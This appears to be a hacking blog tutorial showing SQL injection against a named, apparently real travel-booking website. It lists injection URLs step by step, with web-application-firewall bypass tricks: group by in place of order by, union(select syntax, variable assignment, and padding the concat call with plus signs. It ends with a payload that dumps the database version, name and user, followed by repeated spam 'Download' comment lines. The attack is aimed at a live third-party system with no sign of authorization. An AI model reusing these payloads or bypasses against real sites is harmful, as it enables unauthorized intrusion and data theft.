SQL INJECTION using DIOS (DUMP In One Shot) Method
Target : http://exoticindiatours.in/pckge-details.php?id=2
Now, Let's Start
Finding which comment is working
http://exoticindiatours.in/pckge-details.php?id=2' --+ ====> error
http://exoticindiatours.in/pckge-details.php?id=2 -- ====> no error it's mean comment (--) is working..
-- = # mostly
So, we don't have to use any comment :))
Now it's time to find columns
First we'll use order by
http://exoticindiatours.in/pckge-details.php?id=2 order by 122 ====> Blocked
order by function is blocked.. so, we'll use group by instead of order by
http://exoticindiatours.in/pckge-details.php?id=2 group by 122 ====> showing error it's mean it's working :D
http://exoticindiatours.in/pckge-details.php?id=2 group by 2 ====> Error
http://exoticindiatours.in/pckge-details.php?id=2 group by 1 ====> No error
So, The vuln column is 1
Now, time to use union select
http://exoticindiatours.in/pckge-details.php?id=2 union select 1 ===> Blocked
http://exoticindiatours.in/pckge-details.php?id=2 /*!50000union*/ /*!50000select*/ ====> again blocked
seems Site block special chars (*,!)
Now It's time to do encryption.
For this we'll use union(select
In this .. We'll type columns like this " union(select (1),(2),(3),(4),(5))
Let's try..
http://exoticindiatours.in/pckge-details.php?id=2 union(select (1)) ====> :)) working....
Now it's time to use DIOS
as i already told u concat func is used for print multiple queries
http://exoticindiatours.in/pckge-details.php?id=2 union(select (concat(version(),database(),user()))
We get an error... seems site is blocking ( , ) comma
To bypass we'll use variable method :
and@x:=
Let's try this :
http://exoticindiatours.in/pckge-details.php?id=2
and@x:=concat(version(),database(),user()) union(select (@x))
again error
Let's try Waf. First we'll see which word is blocking site :
http://exoticindiatours.in/pckge-details.php?id=2
and@x:=concat====(version(),database(),user()) union(select (@x)) ===> No error
Concat( = Blocked
For this we'll use + with great amount
Let's do it:
http://exoticindiatours.in/pckge-details.php?id=2
and@x:=concat+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
++++++++++++++++++++++++++++++++++
(0x3c62723e,version(),0x3c62723e,database(),0x3c62723e,user())+UNION(SELECT(@x))#
Sql Injection Using Dios (Dump In One Shot) Method - Code Of Hacking >>>>> Download Now
ReplyDelete>>>>> Download Full
Sql Injection Using Dios (Dump In One Shot) Method - Code Of Hacking >>>>> Download LINK
>>>>> Download Now
Sql Injection Using Dios (Dump In One Shot) Method - Code Of Hacking >>>>> Download Full
>>>>> Download LINK